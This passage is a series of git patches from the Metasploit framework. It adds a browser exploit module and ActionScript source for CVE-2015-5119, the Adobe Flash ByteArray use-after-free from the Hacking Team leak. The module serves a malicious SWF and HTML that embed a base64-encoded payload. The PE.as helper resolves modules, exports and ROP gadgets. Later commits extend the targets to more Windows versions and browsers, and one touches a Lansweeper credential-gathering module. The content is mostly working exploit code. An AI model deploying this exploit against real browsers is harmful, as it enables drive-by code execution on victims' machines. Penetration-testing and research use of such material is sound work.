+			a380:uint, a381:uint, a382:uint, a383:uint, a384:uint, a385:uint, a386:uint, a387:uint, a388:uint, a389:uint,
+			a390:uint, a391:uint, a392:uint, a393:uint, a394:uint, a395:uint, a396:uint, a397:uint, a398:uint, a399:uint,
+
+			a400:uint, a401:uint, a402:uint, a403:uint, a404:uint, a405:uint, a406:uint, a407:uint, a408:uint, a409:uint,
+			a410:uint, a411:uint, a412:uint, a413:uint, a414:uint, a415:uint, a416:uint, a417:uint, a418:uint, a419:uint,
+			a420:uint, a421:uint, a422:uint, a423:uint, a424:uint, a425:uint, a426:uint, a427:uint, a428:uint, a429:uint,
+			a430:uint, a431:uint, a432:uint, a433:uint, a434:uint, a435:uint, a436:uint, a437:uint, a438:uint, a439:uint,
+			a440:uint, a441:uint, a442:uint, a443:uint, a444:uint, a445:uint, a446:uint, a447:uint, a448:uint, a449:uint,
+			a450:uint, a451:uint, a452:uint, a453:uint, a454:uint, a455:uint, a456:uint, a457:uint, a458:uint, a459:uint,
+			a460:uint, a461:uint, a462:uint, a463:uint, a464:uint, a465:uint, a466:uint, a467:uint, a468:uint, a469:uint,
+			a470:uint, a471:uint, a472:uint, a473:uint, a474:uint, a475:uint, a476:uint, a477:uint, a478:uint, a479:uint,
+			a480:uint, a481:uint, a482:uint, a483:uint, a484:uint, a485:uint, a486:uint, a487:uint, a488:uint, a489:uint,
+			a490:uint, a491:uint, a492:uint, a493:uint, a494:uint, a495:uint, a496:uint, a497:uint, a498:uint, a499:uint,
+			
+			a500:uint, a501:uint, a502:uint, a503:uint, a504:uint, a505:uint, a506:uint, a507:uint, a508:uint, a509:uint,
+			a510:uint, a511:uint, a512:uint, a513:uint, a514:uint, a515:uint, a516:uint, a517:uint, a518:uint, a519:uint,
+			a520:uint, a521:uint, a522:uint, a523:uint, a524:uint, a525:uint, a526:uint, a527:uint, a528:uint, a529:uint,
+			a530:uint, a531:uint, a532:uint, a533:uint, a534:uint, a535:uint, a536:uint, a537:uint, a538:uint, a539:uint,
+			a540:uint, a541:uint, a542:uint, a543:uint, a544:uint, a545:uint, a546:uint, a547:uint, a548:uint, a549:uint,
+			a550:uint, a551:uint, a552:uint, a553:uint, a554:uint, a555:uint, a556:uint, a557:uint, a558:uint, a559:uint,
+			a560:uint, a561:uint, a562:uint, a563:uint, a564:uint, a565:uint, a566:uint, a567:uint, a568:uint, a569:uint,
+			a570:uint, a571:uint, a572:uint, a573:uint, a574:uint, a575:uint, a576:uint, a577:uint, a578:uint, a579:uint,
+			a580:uint, a581:uint, a582:uint, a583:uint, a584:uint, a585:uint, a586:uint, a587:uint, a588:uint, a589:uint,
+			a590:uint, a591:uint, a592:uint, a593:uint, a594:uint, a595:uint, a596:uint, a597:uint, a598:uint, a599:uint,
+			
+			a600:uint, a601:uint, a602:uint, a603:uint, a604:uint, a605:uint, a606:uint, a607:uint, a608:uint, a609:uint,
+			a610:uint, a611:uint, a612:uint, a613:uint, a614:uint, a615:uint, a616:uint, a617:uint, a618:uint, a619:uint,
+			a620:uint, a621:uint, a622:uint, a623:uint, a624:uint, a625:uint, a626:uint, a627:uint, a628:uint, a629:uint,
+			a630:uint, a631:uint, a632:uint, a633:uint, a634:uint, a635:uint, a636:uint, a637:uint, a638:uint, a639:uint,
+			a640:uint, a641:uint, a642:uint, a643:uint, a644:uint, a645:uint, a646:uint, a647:uint, a648:uint, a649:uint,
+			a650:uint, a651:uint, a652:uint, a653:uint, a654:uint, a655:uint, a656:uint, a657:uint, a658:uint, a659:uint,
+			a660:uint, a661:uint, a662:uint, a663:uint, a664:uint, a665:uint, a666:uint, a667:uint, a668:uint, a669:uint,
+			a670:uint, a671:uint, a672:uint, a673:uint, a674:uint, a675:uint, a676:uint, a677:uint, a678:uint, a679:uint,
+			a680:uint, a681:uint, a682:uint, a683:uint, a684:uint, a685:uint, a686:uint, a687:uint, a688:uint, a689:uint,
+			a690:uint, a691:uint, a692:uint, a693:uint, a694:uint, a695:uint, a696:uint, a697:uint, a698:uint, a699:uint,
+			
+			a700:uint, a701:uint, a702:uint, a703:uint, a704:uint, a705:uint, a706:uint, a707:uint, a708:uint, a709:uint,
+			a710:uint, a711:uint, a712:uint, a713:uint, a714:uint, a715:uint, a716:uint, a717:uint, a718:uint, a719:uint,
+			a720:uint, a721:uint, a722:uint, a723:uint, a724:uint, a725:uint, a726:uint, a727:uint, a728:uint, a729:uint,
+			a730:uint, a731:uint, a732:uint, a733:uint, a734:uint, a735:uint, a736:uint, a737:uint, a738:uint, a739:uint,
+			a740:uint, a741:uint, a742:uint, a743:uint, a744:uint, a745:uint, a746:uint, a747:uint, a748:uint, a749:uint,
+			a750:uint, a751:uint, a752:uint, a753:uint, a754:uint, a755:uint, a756:uint, a757:uint, a758:uint, a759:uint,
+			a760:uint, a761:uint, a762:uint, a763:uint, a764:uint, a765:uint, a766:uint, a767:uint, a768:uint, a769:uint,
+			a770:uint, a771:uint, a772:uint, a773:uint, a774:uint, a775:uint, a776:uint, a777:uint, a778:uint, a779:uint,
+			a780:uint, a781:uint, a782:uint, a783:uint, a784:uint, a785:uint, a786:uint, a787:uint, a788:uint, a789:uint,
+			a790:uint, a791:uint, a792:uint, a793:uint, a794:uint, a795:uint, a796:uint, a797:uint, a798:uint, a799:uint,
+			
+			a800:uint, a801:uint, a802:uint, a803:uint, a804:uint, a805:uint, a806:uint, a807:uint, a808:uint, a809:uint,
+			a810:uint, a811:uint, a812:uint, a813:uint, a814:uint, a815:uint, a816:uint, a817:uint, a818:uint, a819:uint,
+			a820:uint, a821:uint, a822:uint, a823:uint, a824:uint, a825:uint, a826:uint, a827:uint, a828:uint, a829:uint,
+			a830:uint, a831:uint, a832:uint, a833:uint, a834:uint, a835:uint, a836:uint, a837:uint, a838:uint, a839:uint,
+			a840:uint, a841:uint, a842:uint, a843:uint, a844:uint, a845:uint, a846:uint, a847:uint, a848:uint, a849:uint,
+			a850:uint, a851:uint, a852:uint, a853:uint, a854:uint, a855:uint, a856:uint, a857:uint, a858:uint, a859:uint,
+			a860:uint, a861:uint, a862:uint, a863:uint, a864:uint, a865:uint, a866:uint, a867:uint, a868:uint, a869:uint,
+			a870:uint, a871:uint, a872:uint, a873:uint, a874:uint, a875:uint, a876:uint, a877:uint, a878:uint, a879:uint,
+			a880:uint, a881:uint, a882:uint, a883:uint, a884:uint, a885:uint, a886:uint, a887:uint, a888:uint, a889:uint,
+			a890:uint, a891:uint, a892:uint, a893:uint, a894:uint, a895:uint, a896:uint, a897:uint, a898:uint, a899:uint
+			
+			
+		// constructor
+		function MyClass2(id:int)
+		{
+			o1 = this; 
+			a0 = id;
+			for(var i:int=1; i < 64; i++) this["a"+i] = 0x11223344;
+		}
+	}	
+}
\ No newline at end of file
diff --git a/external/source/exploits/hacking_team/PE.as b/external/source/exploits/hacking_team/PE.as
new file mode 100755
index 0000000000..8753586477
--- /dev/null
+++ b/external/source/exploits/hacking_team/PE.as
@@ -0,0 +1,72 @@
+package
+{
+    public class PE
+    {
+        private var eba:ExploitByteArray
+
+        public function PE(ba:ExploitByteArray)
+        {
+            eba = ba
+        }
+
+        public function base(addr:uint):uint
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (eba.read(addr) == 0x00905a4d) return addr
+                addr -= 0x10000
+            }
+            return 0
+        }
+
+        public function module(name:String, addr:uint):uint
+        {
+            var iat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x80), i:int = -1
+            var mod_name:String
+
+            while (true) {
+                var entry:uint = eba.read(iat + (++i) * 0x14 + 12)
+                if (!entry) throw new Error("FAIL!"); 
+                mod_name = eba.read_string(addr + entry, name.length)
+                if (mod_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return base(eba.read(addr + eba.read(iat + i * 0x14 + 16)))
+        }
+
+        public function procedure(name:String, addr:uint):uint
+        {
+            var eat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x78)
+            var numberOfNames:uint = eba.read(eat + 0x18)
+            var addressOfFunctions:uint = addr + eba.read(eat + 0x1c)
+            var addressOfNames:uint = addr + eba.read(eat + 0x20)
+            var addressOfNameOrdinals:uint = addr + eba.read(eat + 0x24)
+            var proc_name:String
+
+            for (var i:uint = 0; ; i++) {
+                var entry:uint = eba.read(addressOfNames + i * 4)
+                proc_name = eba.read_string(addr + entry, name.length + 2)
+                if (proc_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return addr + eba.read(addressOfFunctions + eba.read(addressOfNameOrdinals + i * 2, "word") * 4)
+        }
+
+        public function gadget(gadget:String, hint:uint, addr:uint):uint
+        {
+            var find:uint = 0
+            var contents:uint = 0
+            var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
+            var value:uint = parseInt(gadget, 16)
+
+            for (var i:uint = 0; i < limit - 4; i++) {
+                contents = eba.read(addr + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return addr + i
+                }
+                if (hint != 0xffffffff && value == (contents & hint)) {
+                    return addr + i
+                }
+            }
+            throw new Error()
+        }
+    }
+}
diff --git a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
new file mode 100644
index 0000000000..24c73740f9
--- /dev/null
+++ b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
@@ -0,0 +1,143 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'                => 'Adobe Flash Player ByteArray Use After Free',
+      'Description'         => %q{
+        This module exploits an use after free on Adobe Flash Player. The vulnerability,
+        discovered by Hacking Team and made public on its July 2015 data leak, was
+        described as an Use After Free while handling ByteArray objects. This module has
+        been tested successfully on:
+
+        Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
+        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
+        Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
+      },
+      'License'             => MSF_LICENSE,
+      'Author'              =>
+        [
+          'Unknown', # Someone from HackingTeam
+          'juan vazquez' # msf module
+        ],
+      'References'          =>
+        [
+          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],
+          ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']
+        ],
+      'Payload'             =>
+        {
+          'DisableNops' => true
+        },
+      'Platform'            => ['win', 'linux'],
+      'Arch'                => [ARCH_X86],
+      'BrowserRequirements' =>
+        {
+          :source  => /script|headers/i,
+          :arch    => ARCH_X86,
+          :os_name => lambda do |os|
+            os =~ OperatingSystems::Match::LINUX ||
+              os =~ OperatingSystems::Match::WINDOWS_7
+          end,
+          :ua_name => lambda do |ua|
+            case target.name
+            when 'Windows'
+              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
+            when 'Linux'
+              return true if ua == Msf::HttpClients::FF
+            end
+
+            false
+          end,
+          :flash   => lambda do |ver|
+            case target.name
+            when 'Windows'
+              return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')
+            when 'Linux'
+              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')
+            end
+
+            false
+          end
+        },
+      'Targets'             =>
+        [
+          [ 'Windows',
+            {
+              'Platform' => 'win'
+            }
+          ],
+          [ 'Linux',
+            {
+              'Platform' => 'linux'
+            }
+          ]
+        ],
+      'Privileged'          => false,
+      'DisclosureDate'      => 'Jul 06 2015',
+      'DefaultTarget'       => 0))
+  end
+
+  def exploit
+    @swf = create_swf
+
+    super
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Request: #{request.uri}")
+
+    if request.uri =~ /\.swf$/
+      print_status('Sending SWF...')
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+      return
+    end
+
+    print_status('Sending HTML...')
+    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+  end
+
+  def exploit_template(cli, target_info)
+    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+    target_payload = get_payload(cli, target_info)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+    os_name = target_info[:os_name]
+
+    if target.name =~ /Windows/
+      platform_id = 'win'
+    elsif target.name =~ /Linux/
+      platform_id = 'linux'
+    end
+
+    html_template = %Q|<html>
+    <body>
+    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+    <param name="movie" value="<%=swf_random%>" />
+    <param name="allowScriptAccess" value="always" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
+    <param name="Play" value="true" />
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
+    </object>
+    </body>
+    </html>
+    |
+
+    return html_template, binding()
+  end
+
+  def create_swf
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'hacking_team', 'msf.swf')
+    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
+
+    swf
+  end
+end

From d30688b1166e37e9f055bf6c13d80dd0e9fbbc79 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 7 Jul 2015 12:33:47 -0500
Subject: [PATCH 0672/1013] Add more requirement info

---
 .../multi/browser/adobe_flash_hacking_team_uaf.rb     | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
index 24c73740f9..96aa1d2a37 100644
--- a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
@@ -19,8 +19,10 @@ class Metasploit3 < Msf::Exploit::Remote
         described as an Use After Free while handling ByteArray objects. This module has
         been tested successfully on:
 
+        Windows XP, Chrome 43 and Adobe Flash 18.0.0.194,
         Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
         Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
+        Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,
         Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
       },
       'License'             => MSF_LICENSE,
@@ -46,12 +48,15 @@ class Metasploit3 < Msf::Exploit::Remote
           :arch    => ARCH_X86,
           :os_name => lambda do |os|
             os =~ OperatingSystems::Match::LINUX ||
-              os =~ OperatingSystems::Match::WINDOWS_7
+              os =~ OperatingSystems::Match::WINDOWS_7 ||
+              os =~ OperatingSystems::Match::WINDOWS_81 ||
+              os =~ OperatingSystems::Match::WINDOWS_VISTA ||
+              os =~ OperatingSystems::Match::WINDOWS_XP
           end,
           :ua_name => lambda do |ua|
             case target.name
             when 'Windows'
-              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
+              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF || ua == Msf::HttpClients::CHROME
             when 'Linux'
               return true if ua == Msf::HttpClients::FF
             end
@@ -61,6 +66,8 @@ class Metasploit3 < Msf::Exploit::Remote
           :flash   => lambda do |ver|
             case target.name
             when 'Windows'
+              # Note: Chrome might be vague about the version.
+              # Instead of 18.0.0.203, it just says 18.0
               return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')
             when 'Linux'
               return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')

From d885420aff2222b3a32f849c64053a9c2b9f3ef0 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 7 Jul 2015 12:42:56 -0500
Subject: [PATCH 0673/1013] This changes the version requirement for
 adobe_flash_hacking_team_uaf.rb

Because it works for Win 8.1 + IE11 too
---
 modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
index 96aa1d2a37..440063f916 100644
--- a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
             when 'Windows'
               # Note: Chrome might be vague about the version.
               # Instead of 18.0.0.203, it just says 18.0
-              return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')
+              return true if Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')
             when 'Linux'
               return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')
             end

From 49effdf3d16a3c373719f013c7adf86110791385 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 7 Jul 2015 12:46:02 -0500
Subject: [PATCH 0674/1013] Update description

---
 modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
index 440063f916..a8b14a53a1 100644
--- a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
@@ -19,10 +19,11 @@ class Metasploit3 < Msf::Exploit::Remote
         described as an Use After Free while handling ByteArray objects. This module has
         been tested successfully on:
 
-        Windows XP, Chrome 43 and Adobe Flash 18.0.0.194,
+        Windows XP, Chrome 43 and Flash 18.0.0.194,
         Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
         Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
         Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,
+        Windows 8.1 (32-bit), IE11 and Flash 17.0.0.169,
         Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
       },
       'License'             => MSF_LICENSE,

From 829b08b2bfc3a6db6011538a3d78d66d333897ec Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 7 Jul 2015 12:49:54 -0500
Subject: [PATCH 0675/1013] Complete authors list

---
 modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
index a8b14a53a1..656e40ba69 100644
--- a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
@@ -30,7 +30,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'Author'              =>
         [
           'Unknown', # Someone from HackingTeam
-          'juan vazquez' # msf module
+          'juan vazquez', # msf module
+          'sinn3r' # msf module
         ],
       'References'          =>
         [

From d3902771b625de9e6888f1174ab1325bb87417fb Mon Sep 17 00:00:00 2001
From: cldrn <calderon@websec.mx>
Date: Tue, 7 Jul 2015 13:48:16 -0500
Subject: [PATCH 0676/1013] Fixes call to the credentials API and adds version
 info

---
 modules/auxiliary/gather/lansweeper_collector.rb | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/modules/auxiliary/gather/lansweeper_collector.rb b/modules/auxiliary/gather/lansweeper_collector.rb
index 551b9e4af3..6eb9267098 100644
--- a/modules/auxiliary/gather/lansweeper_collector.rb
+++ b/modules/auxiliary/gather/lansweeper_collector.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
       'sghctoma <tamas.szakaly [at] praudit [dot] hu>',
       # Lansweeper RCE + discovering default credentials
       'eq <balazs.bucsay [at] praudit [dot] hu>',
-      # Updated module to work on latest version of lansweeper
+      # Module for lansweeper (5.3.0.8)
       'calderpwn <calderon [at] websec [dot] mx>'
     ],
     'License' => MSF_LICENSE,
@@ -107,12 +107,15 @@ class Metasploit3 < Msf::Auxiliary
     service_data = {
       address: opts[:host],
       port: opts[:port],
+      protocol: 'tcp',
+      workspace_id: myworkspace.id,
       service_name: opts[:creds_name],
     }
     credential_data = {
       username: opts[:user],
       private_type: :password,
       private_data: opts[:password],
+      origin_type: :service,
       module_fullname: self.fullname
     }.merge(service_data)
     login_data = {

From 3d630de35372e4f685c2c3886a28d39cd7aac979 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Tue, 7 Jul 2015 14:44:12 -0500
Subject: [PATCH 0677/1013] Replace with a real CVE number

---
 .../{hacking_team => CVE-2015-5119}/msf.swf         | Bin
 .../exploits/{hacking_team => CVE-2015-5119}/Elf.as |   0
 .../{hacking_team => CVE-2015-5119}/Exploit.as      |   0
 .../ExploitByteArray.as                             |   0
 .../ExploitVector.as                                |   0
 .../{hacking_team => CVE-2015-5119}/Exploiter.as    |   0
 .../{hacking_team => CVE-2015-5119}/Logger.as       |   0
 .../{hacking_team => CVE-2015-5119}/MyClass.as      |   0
 .../{hacking_team => CVE-2015-5119}/MyClass1.as     |   0
 .../{hacking_team => CVE-2015-5119}/MyClass2.as     |   0
 .../exploits/{hacking_team => CVE-2015-5119}/PE.as  |   0
 .../multi/browser/adobe_flash_hacking_team_uaf.rb   |   2 +-
 12 files changed, 1 insertion(+), 1 deletion(-)
 rename data/exploits/{hacking_team => CVE-2015-5119}/msf.swf (100%)
 rename external/source/exploits/{hacking_team => CVE-2015-5119}/Elf.as (100%)
 rename external/source/exploits/{hacking_team => CVE-2015-5119}/Exploit.as (100%)
 rename external/source/exploits/{hacking_team => CVE-2015-5119}/ExploitByteArray.as (100%)
 rename external/source/exploits/{hacking_team => CVE-2015-5119}/ExploitVector.as (100%)
 rename external/source/exploits/{hacking_team => CVE-2015-5119}/Exploiter.as (100%)
 rename external/source/exploits/{hacking_team => CVE-2015-5119}/Logger.as (100%)
 rename external/source/exploits/{hacking_team => CVE-2015-5119}/MyClass.as (100%)
 rename external/source/exploits/{hacking_team => CVE-2015-5119}/MyClass1.as (100%)
 rename external/source/exploits/{hacking_team => CVE-2015-5119}/MyClass2.as (100%)
 rename external/source/exploits/{hacking_team => CVE-2015-5119}/PE.as (100%)

diff --git a/data/exploits/hacking_team/msf.swf b/data/exploits/CVE-2015-5119/msf.swf
similarity index 100%
rename from data/exploits/hacking_team/msf.swf
rename to data/exploits/CVE-2015-5119/msf.swf
diff --git a/external/source/exploits/hacking_team/Elf.as b/external/source/exploits/CVE-2015-5119/Elf.as
similarity index 100%
rename from external/source/exploits/hacking_team/Elf.as
rename to external/source/exploits/CVE-2015-5119/Elf.as
diff --git a/external/source/exploits/hacking_team/Exploit.as b/external/source/exploits/CVE-2015-5119/Exploit.as
similarity index 100%
rename from external/source/exploits/hacking_team/Exploit.as
rename to external/source/exploits/CVE-2015-5119/Exploit.as
diff --git a/external/source/exploits/hacking_team/ExploitByteArray.as b/external/source/exploits/CVE-2015-5119/ExploitByteArray.as
similarity index 100%
rename from external/source/exploits/hacking_team/ExploitByteArray.as
rename to external/source/exploits/CVE-2015-5119/ExploitByteArray.as
diff --git a/external/source/exploits/hacking_team/ExploitVector.as b/external/source/exploits/CVE-2015-5119/ExploitVector.as
similarity index 100%
rename from external/source/exploits/hacking_team/ExploitVector.as
rename to external/source/exploits/CVE-2015-5119/ExploitVector.as
diff --git a/external/source/exploits/hacking_team/Exploiter.as b/external/source/exploits/CVE-2015-5119/Exploiter.as
similarity index 100%
rename from external/source/exploits/hacking_team/Exploiter.as
rename to external/source/exploits/CVE-2015-5119/Exploiter.as
diff --git a/external/source/exploits/hacking_team/Logger.as b/external/source/exploits/CVE-2015-5119/Logger.as
similarity index 100%
rename from external/source/exploits/hacking_team/Logger.as
rename to external/source/exploits/CVE-2015-5119/Logger.as
diff --git a/external/source/exploits/hacking_team/MyClass.as b/external/source/exploits/CVE-2015-5119/MyClass.as
similarity index 100%
rename from external/source/exploits/hacking_team/MyClass.as
rename to external/source/exploits/CVE-2015-5119/MyClass.as
diff --git a/external/source/exploits/hacking_team/MyClass1.as b/external/source/exploits/CVE-2015-5119/MyClass1.as
similarity index 100%
rename from external/source/exploits/hacking_team/MyClass1.as
rename to external/source/exploits/CVE-2015-5119/MyClass1.as
diff --git a/external/source/exploits/hacking_team/MyClass2.as b/external/source/exploits/CVE-2015-5119/MyClass2.as
similarity index 100%
rename from external/source/exploits/hacking_team/MyClass2.as
rename to external/source/exploits/CVE-2015-5119/MyClass2.as
diff --git a/external/source/exploits/hacking_team/PE.as b/external/source/exploits/CVE-2015-5119/PE.as
similarity index 100%
rename from external/source/exploits/hacking_team/PE.as
rename to external/source/exploits/CVE-2015-5119/PE.as
diff --git a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
index 656e40ba69..e256249d22 100644
--- a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
@@ -144,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def create_swf
-    path = ::File.join(Msf::Config.data_directory, 'exploits', 'hacking_team', 'msf.swf')
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5119', 'msf.swf')
     swf =  ::File.open(path, 'rb') { |f| swf = f.read }
 
     swf

From 116c3f0be1c8f5f557d320e4f2db65f621f8b908 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Tue, 7 Jul 2015 14:46:44 -0500
Subject: [PATCH 0678/1013] Add CVE as a real ref, too

---
 .../exploits/multi/browser/adobe_flash_hacking_team_uaf.rb   | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
index e256249d22..83217f7fff 100644
--- a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote
         Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
         Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
         Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,
-        Windows 8.1 (32-bit), IE11 and Flash 17.0.0.169,
+        Windows 8.1 (32-bit), IE11 and Flash 17.0.0.169, and
         Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
       },
       'License'             => MSF_LICENSE,
@@ -36,7 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'          =>
         [
           ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],
-          ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']
+          ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816'],
+          ['CVE', '2015-5119']
         ],
       'Payload'             =>
         {

From f8b668e894df7ff375f8329803decebb88989dcf Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 7 Jul 2015 15:43:02 -0500
Subject: [PATCH 0679/1013] Update ranking and References

---
 .../exploits/multi/browser/adobe_flash_hacking_team_uaf.rb | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
index 83217f7fff..9844008c61 100644
--- a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = GoodRanking
+  Rank = GreatRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
 
@@ -35,9 +35,10 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'References'          =>
         [
+          ['CVE', '2015-5119'],
+          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-03.html'],
           ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],
-          ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816'],
-          ['CVE', '2015-5119']
+          ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']
         ],
       'Payload'             =>
         {

From 6a33807d80771de0a1c4f686e8ffa201da1cae28 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 7 Jul 2015 15:56:58 -0500
Subject: [PATCH 0680/1013] No Chrome for now

---
